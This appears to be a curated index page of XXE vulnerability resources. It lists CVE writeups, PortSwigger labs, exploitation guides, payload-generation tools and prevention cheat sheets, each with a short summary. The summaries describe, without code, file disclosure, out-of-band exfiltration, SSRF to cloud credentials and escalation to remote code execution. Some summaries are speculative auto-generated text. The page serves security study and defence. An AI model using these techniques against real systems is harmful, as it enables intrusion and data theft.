XML External Entity Processing (XXE)
An XML External Entity (XXE) attack is a type of attack against an application that parses XML input. It occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser, potentially leading to disclosure of confidential data, denial of service, server-side request forgery, and remote code execution.
XXE exploits a feature of the XML specification itself — the ability to define entities that reference external resources. When a parser resolves these entities, it can be tricked into reading local files (file:///etc/passwd), making HTTP requests to internal services, or exfiltrating data through out-of-band channels. Blind XXE variants use error-based or out-of-band techniques when direct output is not reflected to the attacker.
While XXE is often associated with SOAP APIs and legacy XML endpoints, it surfaces in unexpected places: file uploads (DOCX, XLSX, SVG are all XML-based), SAML authentication flows, RSS feed parsers, and configuration file processors. Any application that accepts XML input — even indirectly — may be vulnerable.
Prevention centers on disabling external entity resolution and DTD processing in XML parsers, but the configuration varies significantly across languages and libraries, making it a persistent source of vulnerabilities.
This page collects XXE research, exploitation techniques, parser-specific bypass methods, and real-world bug bounty writeups.
From OWASP
| Date Added | Link | Excerpt |
|---|---|---|
| 2026-04-22 2026 | GeoServer 2025 XXE Vulnerability (CVE-2025-58360) Explained news | GeoServer 2025 XXE Vulnerability (CVE-2025-58360) Explained |
| 2026-04-22 2026 | Critical Apache Tika Vulnerability Leads to XXE Injection news | Writeup of CVE-2025-66516, a critical XXE injection vulnerability in Apache Tika, affecting tika-core, tika-pdf-module, and tika-parsers. Attackers can exploit this flaw via crafted XFA files within PDFs, potentially leading to information leaks, SSRF, DoS, or RCE. This issue expands the scope of a previous vulnerability, CVE-2025-54988. Patches are available in tika-core 3.2.2, tika-parser-pdf-module 3.2.2, and tika-parsers 2.0.0. → securityweek.com |
| 2026-04-22 2026 | CVE-2025-30220: GeoServer WFS Service XML External Entity news | Writeup on CVE-2025-30220 in GeoServer's WFS service details an XML External Entity (XXE) vulnerability. This allows unauthenticated remote attackers to exfiltrate arbitrary local files, leading to information disclosure and enabling Server-Side Request Forgery (SSRF). The vulnerability bypasses GeoServer's allowlist by exploiting how the GeoTools library processes XSD Schema representations. |
| 2026-04-22 2026 | CVE-2025-27136: LocalS3 CreateBucketConfiguration XXE Injection news | Writeup of CVE-2025-27136, an XML External Entity (XXE) injection vulnerability in LocalS3's CreateBucketConfiguration endpoint, allowing attackers to read sensitive files. The flaw arises from an insecure XML parser that doesn't disable external entity resolution. Exploitation involves crafting a malicious XML payload with a `<!DOCTYPE>` declaration and `file://` URI to retrieve files like `/etc/passwd`. Mitigation requires updating LocalS3 or securing XML parser configurations to disable external entity resolution. |
| 2026-04-22 2026 | CVE-2024-30043: Exploiting XXE on SharePoint via Confused URL Parsing (PoC) intermediate | CVE-2024-30043: Exploiting XXE on SharePoint via Confused URL Parsing (PoC) |
| 2026-04-22 2026 | CVE-2025-66516: Detecting and Defending Against Apache Tika XXE news | CVE-2025-66516: Detecting and Defending Against Apache Tika XXE → akamai.com |
| 2026-04-19 2026 | IBM Business Automation Workflow XXE (CVE-2025-13096) news | Bulletin concerning CVE-2025-13096, an XML external entity injection (XXE) vulnerability affecting IBM Business Automation Workflow. This flaw, categorized under CWE-918 (Server-Side Request Forgery), allows remote attackers to potentially expose sensitive information or consume memory resources. IBM recommends applying the Interim Fix (iFix) or Cumulative Fix (CF) containing DT456229 to remediate this issue. |
| 2026-04-19 2026 | XXE Vulnerability Guide 2025: How XML Attacks Still Threaten beginner | Library of techniques and code examples for understanding and mitigating XML External Entity (XXE) vulnerabilities, which continue to threaten modern applications in 2025. This resource covers file disclosure attacks, server-side request forgery (SSRF), and denial-of-service exploits like the "Billion Laughs" attack, highlighting their relevance in SOAP APIs, file upload features with SVG, and legacy systems. Specific examples of vulnerable systems include Akamai CloudTest (CVE-2025-49493) and Ambari/Oozie (CVE-2025-23195), demonstrating how attackers can access sensitive files and internal network resources. |
| 2026-04-19 2026 | XXE Injection in langchain-community (CVE-2025-6984) news | Writeup of CVE-2025-6984 in langchain-community detailing an XML External Entity (XXE) Injection vulnerability. This flaw allows attackers to exploit insecure use of `etree.iterparse()` to access sensitive local files and potentially cause Denial of Service by submitting crafted XML payloads. The vulnerability affects versions prior to 0.3.27, with an upgrade to 0.3.27 or higher recommended. → security.snyk.io |
| 2026-04-19 2026 | Critical Apache Tika CVE-2025-66516: XXE Vulnerability news | Library that helps secure applications against the critical Apache Tika CVE-2025-66516 XXE vulnerability. This flaw allows attackers to submit crafted PDF files with malicious XFA content to achieve sensitive file disclosure, SSRF, and potential RCE. It affects specific versions of `tika-core`, `tika-parser-pdf-module`, and `tika-parsers`, and has seen active exploitation in the wild with over 500 vulnerable instances discovered. → rescana.com |
| 2026-04-19 2026 | XXE in GeoServer WFS Service (CVE-2025-30220) news | Writeup of CVE-2025-30220, an XML External Entity (XXE) processing vulnerability in GeoServer's WFS service. This flaw, originating in the GeoTools library's handling of XML schemas, bypasses entity resolution controls and allows for information disclosure via out-of-band data exfiltration and Server-Side Request Forgery (SSRF) by crafting malicious XML payloads. Affected versions include 2.27.0, 2.26.0-2.26.2, and versions prior to 2.25.7. Mitigation involves upgrading to patched versions 2.27.1, 2.26.3, or 2.25.7. |
| 2026-04-16 2026 | XXElixir: Tool for Testing XXE via XLSX File Upload Poisoning intermediate | Tool for testing XML External Entity (XXE) vulnerabilities via XLSX file upload poisoning. XXElixir allows users to inject custom XML content or specify an out-of-band URL to retrieve external entity data. It achieves this by unzipping the XLSX, modifying the workbook.xml with the specified content or URL, and re-zipping it into a new file for testing applications accepting XLSX uploads. |
| 2026-04-16 2026 | Exploiting XXE via File Uploads (SVG, XLSX, DOCX) intermediate | Exploiting XXE via File Uploads (SVG, XLSX, DOCX) → exploit-db.com |
| 2026-04-16 2026 | XXE-OOB-Exfiltrator: Multi-line Content Exfiltration via External DTD intermediate | Tool for exploiting XXE Out-Of-Band vulnerabilities, enabling exfiltration of file content or directory listings. It utilizes a self-hosted HTTP server for external DTD inclusion and a simulated FTP server for transferring data, supporting multi-line and Base64 encoded exfiltration via `ftp://` and `php://` URI schemes respectively. The tool can exfiltrate single or multiple files using a wordlist and features automatic exploit triggering via JSON request files, with options for output redirection and proxy integration. |
| 2026-04-16 2026 | Blind XXE Attacks: Out of Band Interaction Techniques to Exfiltrate Data intermediate | Technique for blind XXE attacks that describes using Out-of-Band Application Security Testing (OAST) to exfiltrate data. It details how to craft malicious DTDs and leverage XML parameter entities, including techniques for extracting data via HTTP requests, FTP, and handling unparsable XML files using CDATA sections. The writeup references Burp Collaborator for OAST interactions and PortSwigger labs for practical application. |
| 2026-04-16 2026 | Exploiting Out-Of-Band XXE on Wildfire intermediate | Writeup detailing Out-of-Band XXE exploitation using the HTTP LOCK method discovered during a red teaming engagement. The process involves identifying enabled HTTP methods like LOCK, which accept XML input, then crafting an external DTD to exfiltrate data such as `/etc/passwd` and sensitive configuration files. The author also presents a nuclei template for detecting this XXE vulnerability across multiple instances. |
| 2026-04-16 2026 | Out-of-Band XML External Entity (OOB XXE) beginner | Writeup on Out-of-Band XML External Entity (OOB XXE) vulnerabilities, detailing how attackers exfiltrate sensitive data like `/etc/passwd` using attacker-controlled HTTP servers and external DTDs. It contrasts OOB XXE with blind XXE and provides a proof-of-concept example. The writeup emphasizes that disabling XML external entity processing and external DTD support, as recommended by OWASP, is the sole effective prevention against both in-band and OOB XXE attacks. → invicti.com |
| 2026-04-16 2026 | Top HackerOne XXE Reports beginner | Reports on XML External Entity (XXE) vulnerabilities from HackerOne detail findings across various companies including Starbucks, Mail.ru, X, DuckDuckGo, Pornhub, Informatica, Semrush, Zivver, U.S. Dept Of Defense, Rockstar Games, Uber, QIWI, WordPress, drchrono, Evernote, VK.com, Adobe, Bime, Moneybird, and Coinbase. These reports highlight diverse exploitation vectors such as SVG uploads, JPEG metadata injection, blind XXE, and SSRF, with some even leading to Remote Code Execution (RCE). |
| 2026-04-16 2026 | How to Find XXE Bugs: Severe, Missed, and Misunderstood intermediate | How to Find XXE Bugs: Severe, Missed, and Misunderstood → bugcrowd.com |
| 2026-04-16 2026 | A Deep Dive Into XXE Injection (Synack) advanced | Library detailing XML External Entity (XXE) injection, a prevalent vulnerability found anywhere an XML parser exists, not just web applications. It explains how ENTITYs within Document Type Definitions (DTDs) can be manipulated, even via POST requests intercepted with tools like Burpsuite, to exfiltrate local files such as `/etc/passwd` or use out-of-band techniques with external DTDs. |
| 2026-04-16 2026 | Top 25 XXE Bug Bounty Reports beginner | Top 25 XXE Bug Bounty Reports → corneacristian.medium.com |
| 2026-04-10 2026 | XXE in Apache Struts CVE-2025-68493 news | XXE in Apache Struts CVE-2025-68493 |
| 2026-04-10 2026 | PortSwigger Blind XXE Lab Write-up intermediate | PortSwigger Blind XXE Lab Write-up |
| 2026-04-10 2026 | Out-of-Band XXE Attack with Sensitive Data Exfiltration intermediate | Out-of-Band XXE Attack with Sensitive Data Exfiltration |
| 2026-04-10 2026 | Advanced XXE Exploitation: File Disclosure, Blind OOB, and RCE advanced | Writeup detailing advanced XML External Entity (XXE) exploitation techniques including local file disclosure for sensitive data like `/etc/passwd` and `config.php`, bypassing character restrictions with `php://filter` and Base64 encoding, performing blind XXE via DNS and HTTP out-of-band (OOB) exfiltration, and achieving remote code execution (RCE) on misconfigured PHP servers using the `expect://` wrapper, as demonstrated on a target.com endpoint. |
| 2026-04-10 2026 | XXE Injection Overview beginner | XXE Injection Overview |
| 2026-04-10 2026 | Exploiting Blind XXE: Data Exfiltration Through External DTD intermediate | Exploiting Blind XXE: Data Exfiltration Through External DTD |
| 2026-04-10 2026 | PortSwigger XXE Injection Writeups intermediate | Writeups detailing nine PortSwigger labs demonstrate exploitation of XML External Entity (XXE) vulnerabilities. Techniques covered include retrieving files from `/etc/passwd` and `/etc/hostname`, performing Server-Side Request Forgery (SSRF) to access EC2 metadata and obtain IAM credentials, bypassing security restrictions using XInclude and parameter entities, out-of-band data exfiltration via Burp Collaborator, and repurposing local DTDs to extract data through error messages. The labs also showcase exploiting XXE via image file uploads using SVG. |
| 2026-04-10 2026 | Blind XXE Lab: Exfiltrate Data Using Malicious External DTD intermediate | Lab demonstrating blind XXE with out-of-band exfiltration, using Burp Suite Professional and an exploit server. The technique involves creating a malicious external DTD file containing an entity to retrieve `/etc/hostname` and trigger an interaction with Burp Collaborator. This interaction then reveals the exfiltrated data via DNS and HTTP requests. → portswigger.net |
| 2026-04-10 2026 | XML External Entity - GeeksforGeeks beginner | Library that helps prevent XML External Entity (XXE) vulnerabilities by disabling external entity processing or validating input. XXE attacks can lead to information disclosure, SSRF, DoS, and code execution by abusing untrusted XML parsing, as demonstrated in a PortSwigger lab exploiting file retrieval via an external entity reference. Mitigation involves updating XML libraries and employing secure development practices. → geeksforgeeks.org |
| 2026-04-10 2026 | Cisco ISE XXE Information Disclosure intermediate | Cisco ISE XXE Information Disclosure |
| 2026-04-10 2026 | XXE Injection: Advanced Exploitation Guide advanced | Guide to exploiting advanced XML External Entity (XXE) vulnerabilities, covering identification and exploitation techniques. The guide details common vulnerable components, simple XXE to SSRF attacks, bypassing filters with external DTDs and parameter entities, and resource exhaustion via the 'Billion Laughs' attack. It also touches upon UTF-7 encoding as a potential evasion method. → intigriti.com |
| 2026-04-10 2026 | XXE Complete Guide: Impact, Examples, and Prevention beginner | Reference detailing XML External Entity (XXE) vulnerabilities, their impact including denial of service, data exposure, and server-side request forgery (SSRF), and mitigation strategies like using Web Application Firewalls (WAFs) and application server instrumentation. It provides examples of resource exhaustion, data extraction using `file://` URIs, SSRF attacks targeting internal systems, and blind XXE for out-of-band data exfiltration. → hackerone.com |
| 2026-04-10 2026 | CVE-2025-49493: XXE in Akamai CloudTest news | Writeup of CVE-2025-49493, an XML External Entity (XXE) vulnerability discovered in Akamai CloudTest by XBOW. The vulnerability, exploitable through multiple SOAP endpoints like `/concerto/services/RepositoryService`, allowed for unauthorized access to sensitive data, including the contents of `/etc/passwd`, by leveraging external DTDs and error-based exfiltration techniques. Akamai has since fixed the issue by disabling DTD processing entirely. |
| 2026-04-06 2026 | CVE-2025-11035: Jinher OA XXE Vulnerability news | Writeup of CVE-2025-11035 details an XML External Entity (XXE) vulnerability in Jinher OA 2.0, specifically affecting the ManageWord.aspx endpoint. This flaw allows authenticated remote attackers to exfiltrate data, perform server-side request forgery (SSRF), and access internal network resources by manipulating XML input and referencing external entities. Mitigation strategies include input validation, web application firewall rules to block DOCTYPE declarations, and secure XML parser configuration to disable DTD processing. → sentinelone.com |
| 2026-04-06 2026 | CVE-2025-54254: Adobe Experience Manager Forms XXE Vulnerability news | Analysis of CVE-2025-54254 reveals an XXE vulnerability in Adobe Experience Manager Forms versions 6.5.23 and earlier. This flaw, stemming from improper XML external entity reference handling (CWE-611), allows unauthenticated attackers to read arbitrary files from the server's file system without user interaction. Exploitation involves submitting crafted XML payloads to vulnerable endpoints, potentially exposing sensitive data. Mitigation requires applying Adobe's security patch (APSB25-82), configuring XML parsers to disable external entities, or implementing WAF rules to block XXE patterns. → sentinelone.com |
| 2026-04-06 2026 | CVE-2026-29924: XXE Vulnerability news | CVE-2026-29924: XXE Vulnerability → tenable.com |
| 2026-04-06 2026 | CVE-2026-34401: XXE in Wwbn Avideo news | Writeup detailing CVE-2026-34401, an XML External Entity (XXE) vulnerability in Wwbn Avideo prior to version 2.9.0.21. This flaw arises from XML Notepad's default resolution of external entities via DTD processing, allowing attackers to craft malicious XML files that trigger outbound HTTP/SMB requests. Such requests can lead to the leakage of local file contents or the capture of user NTLM credentials. The vulnerability has been patched in version 2.9.0.21. |
| 2026-04-03 2026 | Advanced XXE Exploitation: File Disclosure, Blind OOB, and RCE advanced | Writeup detailing advanced XML External Entity (XXE) exploitation techniques, including local file disclosure of sensitive files like `/etc/passwd` and `config.php`, bypassing character restrictions with PHP filters for Base64 encoding, and achieving blind XXE via DNS and HTTP exfiltration. The writeup further demonstrates escalating XXE to Remote Code Execution (RCE) on misconfigured PHP servers utilizing the `expect://` wrapper for command execution and establishing persistence with a reverse shell. |
| 2026-04-03 2026 | What is XXE (XML External Entity) | Examples & Prevention | Imperva beginner | Library on XXE (XML External Entity) vulnerabilities, detailing attack vectors and mitigation strategies. The content explains how XXE flaws arise from the parsing of XML input containing external entities, enabling attackers to exfiltrate sensitive data, perform denial-of-service attacks, and even interact with internal systems or the underlying operating system. Prevention methods emphasize disabling external entity processing in XML parsers and implementing input validation. → imperva.com |
| 2026-04-03 2026 | XML External Entities (XXE) | Pentesting Notes beginner | XML External Entities (XXE) | Pentesting Notes |
| 2026-04-03 2026 | XML External Entity (XXE) Processing | OWASP beginner | Reference on XML External Entity (XXE) Processing details the CWE-611 vulnerability, where applications parse XML input with weakly configured parsers. This can lead to sensitive data disclosure, denial of service, server-side request forgery, and even code execution. The entry covers how external entities are defined and processed, providing examples of attacks like accessing local files (`file:///etc/passwd`) and remote resource inclusion (`http://www.attacker.com/text.txt`), and recommends disabling DTD processing to mitigate risks. → owasp.org |
| 2026-04-03 2026 | Blind XXE: Exfiltrating Data Out-of-Band in 2025 advanced | Library for demonstrating and exploiting Blind XXE vulnerabilities, where applications don't reflect external entity values in responses. This library covers out-of-band data exfiltration techniques using parameter entities and malicious DTDs, error-based exploitation, and exploiting local DTD files. It also touches on protocol handlers like FTP for data exfiltration, HTTP/HTTPS for SSRF, and various `file://` protocol variations. Real-world scenarios like internal network reconnaissance, cloud metadata exploitation, and targeting database configuration files are discussed, along with mentions of vulnerabilities like CVE-2024-5919 in Palo Alto Networks PAN-OS. |
| 2026-04-03 2026 | Comprehensive Guide to XXE Exploitation: Advanced Data Exfiltration and RCE advanced | Guide to XXE Exploitation details advanced techniques for exploiting XML External Entity vulnerabilities. It covers identifying vulnerable XML endpoints using tools like Burp Suite, testing for basic XXE, and bypassing input validation with `php://filter`. The guide demonstrates blind XXE via HTTP and DNS out-of-band exfiltration, and outlines methods to achieve Remote Code Execution (RCE) using wrappers like `expect://` and deploying web shells. Specific vulnerabilities discussed include information disclosure (CWE-200) and SSRF. |
| 2026-04-03 2026 | XML External Entity: The Ultimate Bug Bounty Guide to XXE | YesWeHack beginner | Guide to XML External Entity (XXE) vulnerabilities, this resource details how attackers exploit XML parsers to access sensitive files like /etc/passwd, conduct internal network reconnaissance, and even achieve remote code execution. It covers how XXE attacks leverage external entity declarations within XML input, leading to file disclosure, Server-Side Request Forgery (SSRF), and denial-of-service. The guide explains that XXE often arises from legacy code, explicit feature enablement, or custom configurations in parsers used in document processing systems (DOCX, XLSX), API endpoints, SOAP services, and SVG processors. → yeswehack.com |
| 2026-04-03 2026 | XML External Entity (XXE) Attack Guide | Hackviser beginner | Guide to XML External Entity (XXE) attacks, detailing manual testing techniques for identifying vulnerabilities in various XML inputs, including file uploads and SOAP requests. It covers exploitation methods such as local file disclosure, server-side request forgery (SSRF) via HTTP callbacks and PHP wrappers, denial of service attacks like the "Billion Laughs" attack, and automated discovery using tools like Burp Suite, XXEinjector, and Nuclei. |
| 2026-04-03 2026 | What is a Blind XXE Attack? | PortSwigger beginner | Reference detailing techniques for finding and exploiting blind XXE vulnerabilities. It describes how these attacks, where the application doesn't return entity values directly, can be overcome using out-of-band (OAST) methods to detect them or by triggering XML parsing errors that exfiltrate sensitive data from files like `/etc/passwd` via HTTP requests or error messages. The guide also covers using XML parameter entities and repurposing local DTDs for exploitation. → portswigger.net |
| 2025-08-14 2025 | Exploiting XXE for SSRF. Retrieving IAM credentials of EC2… | by Gupta Bles intermediate SSRF | The content discusses exploiting XML External Entity (XXE) vulnerabilities to achieve Server-Side Request Forgery (SSRF) attacks. Specifically, it focuses on retrieving IAM credentials of EC2 instances. The author, Gupta Bles, likely provides insights into how attackers can leverage XXE vulnerabilities to manipulate XML input and trigger SSRF to access sensitive information like IAM credentials. This practice highlights the importance of securing systems against XXE vulnerabilities to prevent unauthorized access to critical data. |
| 2025-08-14 2025 | XXE - Things Are Getting Out of Band intermediate | Library for out-of-band XXE attacks, detailing data exfiltration techniques via FTP and HTTP. It covers exploiting vulnerable Java and ASP.NET applications, demonstrating how to craft XML payloads to trigger external requests for sensitive file contents like `/etc/passwd`. The library also briefly touches upon RCE via XXE in ASP.NET by downloading a webshell. → blog.zsec.uk |
| 2025-08-14 2025 | https://www.slideshare.net/ssuserf09cba/xxe-how-to-become-a-jedi beginner | The content discusses how to become a "Jedi" in the context of XXE (XML External Entity) attacks. It covers the basics of XXE attacks, their impact, and how to prevent them. The presentation outlines steps to become proficient in identifying and mitigating XXE vulnerabilities, emphasizing the importance of understanding XML parsing and secure coding practices. It also provides practical examples and resources for further learning. Overall, the content aims to educate individuals on the risks associated with XXE attacks and empower them to enhance their cybersecurity skills in this area. → slideshare.net |
| 2025-08-14 2025 | Hunting in the Dark - Blind XXE intermediate | Writeup detailing blind XXE attacks against a JSON endpoint that parses XML content. The author demonstrates how to identify XML processing by altering the `Content-Type` header and uses error-based responses to perform port scanning on the backend. Techniques explored include exploiting Java-based `UnmarshalException` errors and utilizing Server Side Request Forgery (SSRF) to probe open ports like 8080. → blog.zsec.uk |
| 2025-08-14 2025 | XXE ALL THE THINGS!!! (including Apple iOS's Office Viewer)_HackDig intermediate | Library for detecting and exploiting XML External Entity (XXE) vulnerabilities, demonstrating effective techniques against various targets including Apple iOS's Office Viewer. This resource provides practical insights into how XXE can be leveraged for broader security assessments. |
| 2025-08-14 2025 | GDS - Blog - Automated Data Exfiltration with XXE intermediate | The content appears to be a blog post from GDS discussing automated data exfiltration using XXE (XML External Entity) attacks. XXE attacks involve exploiting vulnerabilities in XML parsers to access sensitive data. This blog post likely delves into the technical details of how XXE attacks can be automated to extract data from a system. It may provide insights on the risks associated with XXE attacks and how organizations can protect themselves from such threats. |
| 2025-08-14 2025 | Advice From A Researcher: Hunting XXE For Fun and Profit intermediate | The content titled "Advice From A Researcher: Hunting XXE For Fun and Profit" likely discusses insights and tips from a researcher on exploiting XML External Entity (XXE) vulnerabilities for both enjoyment and financial gain. It may cover techniques, strategies, and potential rewards associated with identifying and exploiting XXE flaws in software or systems. The content likely aims to provide guidance on how to effectively hunt for XXE vulnerabilities, highlighting the benefits of doing so. |
| 2025-08-14 2025 | Tool for automatic exploitation of XXE vulnerability using direct and diffe intermediate | Tool for automating XXE exploitation, XXEinjector supports both direct and out-of-band retrieval of files. It facilitates directory listing specifically for Java applications, and employs bruteforcing for others. Key features include out-of-band methods (FTP, HTTP, Gopher), direct exploitation with custom marks, and advanced techniques like CDATA for direct exploitation, PHP filters for base64 encoding, and Windows hash retrieval. XXEinjector can also upload files via Java JAR schema, execute system commands with PHP expect, and test for XSLT injection. |
| 2025-08-14 2025 | GDS - Blog - Automated Data Exfiltration with XXE intermediate | The content appears to be a blog post from GDS discussing automated data exfiltration using XXE (XML External Entity) attacks. XXE attacks involve exploiting vulnerabilities in XML parsers to access sensitive data. The blog may provide insights into how attackers can automate this process to extract data from a target system. It likely discusses the risks associated with XXE attacks and how organizations can protect themselves against such threats. |
| 2025-08-14 2025 | h3xStream's blog: Identifying Xml eXternal Entity vulnerability (XXE) beginner | Writeup on identifying XML External Entity (XXE) vulnerabilities, detailing methods to confirm entity interpretation, system entity usability, and data exfiltration using external DTDs and the gopher protocol. It covers techniques for testing parser capabilities and specific exploitation scenarios, including references to related attacks like CVE-2013-6397. Mitigation strategies involve disabling SYSTEM entities and updating Java Virtual Machine versions. |
| 2025-08-14 2025 | 10 Types of Web Vulnerabilities that are Often Missed - Detectify Labs beginner SSRF XSS | Library detailing ten often-missed web vulnerabilities including HTTP/2 Smuggling, XXE via Office Open XML Parsers, SSRF via XSS in PDF Generators, and XSS via SVG files. The content highlights how to identify and exploit these vulnerabilities, referencing tools like http2smugl and concepts such as HTTP desync attacks and AWS metadata endpoints. It also points to research from Hakluke, Farah Hawa, and James Kettle. → labs.detectify.com |
| 2025-08-14 2025 | https://www.hahwul.com/2019/09/28/oxml-xxe-payload-inject-tool-docem/ intermediate Bug Bounty | The content discusses a tool called "Docem" developed by a security researcher for injecting XXE payloads into OXML files. It explains how the tool can be used to exploit XML External Entity vulnerabilities in OXML documents, potentially leading to data theft or system compromise. The article provides details on the tool's features, usage, and examples of injecting payloads. It aims to raise awareness about the risks associated with XXE vulnerabilities in OXML files and emphasizes the importance of securing systems against such attacks. |
| 2025-08-14 2025 | Awesome Bug Bounty Tools beginner Bug Bounty Recon | Library of curated bug bounty tools, featuring extensive lists for subdomain enumeration with tools like Subfinder, Findomain, and massdns, alongside port scanning utilities such as Nmap, RustScan, and naabu. It also includes web screenshotting and fingerprinting tools like EyeWitness, gowitness, and whatweb, as well as content discovery tools like gobuster and feroxbuster, covering vulnerabilities such as XSS, SQL Injection, and Directory Traversal. |
| 2025-08-14 2025 | https://www.hackingarticles.in/burp-suite-for-pentester-hackbar/ intermediate Burp XSS | Library for Burp Suite that accelerates manual penetration testing by offering pre-defined payloads for common vulnerabilities. HackBar integrates with Burp Suite's Repeater and Proxy tabs, providing dropdown lists of attack strings for SQL Injection, Cross-Site Scripting (XSS), Local File Inclusion (LFI), XXE Injection, and OS Command Injection, significantly reducing the time spent on manual payload insertion and testing against applications like bWAPP and Acunetix. |
| 2025-08-14 2025 | https://gosecure.github.io/xxe-workshop/#0 beginner | Workshop slides detailing XML External Entity (XXE) exploitation techniques for PHP and Java applications. This resource covers identifying XXE vulnerabilities and converting them into directory listing, file exfiltration, file write, and remote code execution via classic XML patterns, out-of-band DTD techniques, and FTP/Gopher protocols. It includes four lab applications, sample payloads, and Docker recipes for deployment. |
| 2025-08-14 2025 | XXE-study/xxe.php at master · HLOverflow/XXE-study intermediate | The content refers to a file named "xxe.php" within the "XXE-study" repository on GitHub owned by "HLOverflow." This file is located in the "master" branch of the repository. The term "XXE" likely stands for XML External Entity, a type of security vulnerability. The content does not provide specific details about the file or its purpose, but it suggests that it is part of a study or project related to XXE vulnerabilities. |
| 2025-08-14 2025 | XXE - XEE - XML External Entity - HackTricks beginner | Library detailing XML External Entity (XXE) vulnerabilities. It explains XML entities, DTDs, and custom/external entity definitions, highlighting how parsers can be exploited. The resource covers techniques for detecting XXE using parameter entities, including out-of-band detection methods and attempts to read local files like `/etc/passwd` and `C:\windows\system32\drivers\etc\hosts`. It also demonstrates advanced exfiltration strategies using malicious external DTDs to send file contents via HTTP requests or display them within error messages, and explores XXE for SSRF attacks against cloud metadata endpoints. → book.hacktricks.xyz |
| 2025-08-14 2025 | Exploiting The Entity: XXE (XML External Entity Injection) - Pentestmag beginner | The content discusses XXE (XML External Entity Injection) vulnerabilities, a type of attack where an attacker can manipulate XML input to access sensitive data or execute remote code. XXE exploits can lead to data theft, server-side request forgery, and denial of service attacks. Understanding XXE vulnerabilities is crucial for security professionals to prevent such attacks and protect systems from exploitation. The article likely provides insights into detecting, preventing, and mitigating XXE vulnerabilities to enhance cybersecurity measures. |
| 2025-08-14 2025 | https://www.noob.ninja/2019/12/spilling-local-files-via-xxe-when-http.html intermediate | Writeup detailing XXE exploitation when HTTP Out-of-Band is blocked, utilizing verbose XML parsing errors to exfiltrate local files. It covers bypassing Cloudflare WAF by omitting XML declarations and adding spaces to file protocols, and then explores advanced techniques like exploiting local DTDs found with tools like GoSecure's `dtd-finder` to overwrite existing entities. The exploit leverages the `jar` protocol on Java applications to read files from archives and inject them into error messages, revealing sensitive data like `/etc/passwd`. |
| 2025-08-14 2025 | XML External Entity Prevention · OWASP Cheat Sheet Series beginner | Library that guides developers in preventing XML External Entity (XXE) injection vulnerabilities, a common OWASP Top 10 threat. It details specific configurations for various XML parsers across languages like Java (JAXP, DOM4J), C++ (libxml2, libxerces-c), and ColdFusion (Adobe, Lucee), emphasizing the critical need to disable DOCTYPE declarations and external entity loading to mitigate risks like SSRF and denial-of-service attacks. → cheatsheetseries.owasp.org |
| 2025-08-14 2025 | https://portswigger.net/web-security/xxe beginner | Library detailing XML external entity (XXE) injection, a web security vulnerability allowing attackers to interfere with XML data processing. It covers exploiting XXE to retrieve files, perform server-side request forgery (SSRF), and exfiltrate data via blind XXE techniques. The library also discusses XInclude attacks and XXE vulnerabilities in file uploads, specifically mentioning SVG format. → portswigger.net |
| 2025-08-14 2025 | From blind XXE to root-level file read access – Honoki advanced | Writeup detailing blind XXE exploitation, focusing on error message analysis to identify the Java SAX Parser and infer firewall behavior. The technique successfully enumerated internal services and reached internal applications like wiki.company.internal, demonstrating how to elevate a medium-criticality XXE vulnerability to a critical finding. |
| 2025-08-14 2025 | XXE - XML External Entity Attack beginner | XXE, or XML External Entity Attack, is a type of security vulnerability where an attacker can exploit the processing of XML data by including external entities that can disclose confidential information, execute remote code, or cause a denial of service. This attack can occur when an application processes XML input without proper validation and allows external entities to be included. Preventing XXE attacks involves disabling external entity processing, using whitelists for allowed entities, and validating input data to ensure it does not contain malicious XML entities. → slideshare.net |
| 2025-08-14 2025 | XXE at Bol.com – Jonathan Bouman – Medium intermediate | The content appears to be a post titled "XXE at Bol.com" by Jonathan Bouman on the platform Medium. It likely discusses a potential XML External Entity (XXE) vulnerability found at Bol.com, a Dutch online retailer. XXE vulnerabilities can allow attackers to exploit XML processing functionality and access sensitive data. The post may delve into the impact of this vulnerability on Bol.com's security and how it was discovered or addressed. For more detailed information, it is recommended to read the full post on Medium. |
| 2024-11-10 2024 | GitHub - whitel1st/docem: A tool to embed XXE and XSS payloads in docx, odt, pptx, xlsx files (oxml_xxe on steroids) intermediate XSS | Tool for embedding XXE and XSS payloads into document formats like DOCX, ODT, and PPTX. This utility operates by identifying "magic symbols" within sample documents and replacing them with specified payloads. It offers flexible payload injection modes, allowing for placement per document, per file, or per specific location, and supports custom payload files for both XXE and XSS vulnerabilities. Docem aims to improve upon the usability of tools like oxml_xxe for large-scale payload generation. |
| 2024-10-17 2024 | B-XSSRF - Toolkit To Detect And Keep Track On Blind XSS, XXE And SSRF intermediate SSRF XSS | "B-XSSRF is a toolkit designed to detect and monitor Blind XSS, XXE, and SSRF vulnerabilities. The setup involves uploading files to a server and creating a database. The toolkit helps in identifying and tracking these security issues to enhance the overall security posture of a system." → kitploit.com |
| 2024-09-21 2024 | XXE : From Zero to Hero beginner | Hello fellow hackers, I hope you all are doing good and learning something new :) . As i said in my RECON blog I will be writing about… → infosecwriteups.com |
| 2023-11-07 2023 | 11.2 Lab: Exploiting XXE to perform SSRF attacks | 2023 intermediate SSRF | The content discusses a lab focusing on exploiting XML External Entity (XXE) vulnerabilities to execute Server-Side Request Forgery (SSRF) attacks. This lab aims to demonstrate how XXE vulnerabilities can be leveraged to manipulate server-side requests and potentially access sensitive information or resources. The practice scenario likely involves hands-on exercises to understand the exploitation process and its implications for security. Participants can gain practical experience in identifying and mitigating XXE vulnerabilities to enhance their cybersecurity skills. → cyberw1ng.medium.com |
| 2023-08-19 2023 | XXExploiter intermediate | Tool for generating XML payloads and serving DTDs for XML External Entity (XXE) injection attacks. XXExploiter supports various modes including XML, Out-of-Band (OOB), and CDATA extraction, with options for command execution via PHP's expect, data exfiltration, and fuzzing specific parameters using wordlists. It can automatically start a server for OOB data transfer and also acts as a client to send XML files and retrieve responses. |
| 2022-08-10 2022 | How to Protect Text Input from XML External Entity (XXE) Attacks using Pyth intermediate Python | The content discusses protecting text input from XML External Entity (XXE) attacks using Python. XXE attacks aim to disrupt an application's handling of serialized data. Implementing countermeasures in Python can help prevent these attacks and ensure the security of the application. |
| 2021-05-18 2021 | If you find powerful OXML XXE tool? it’s “DOCEM” intermediate Bug Bounty | The content shares a tool called "DOCEM" for XXE testing, which is considered more convenient than other existing tools. It aims to assist in finding a powerful OXML XXE tool, offering a more user-friendly experience compared to manual methods or previously available tools. |
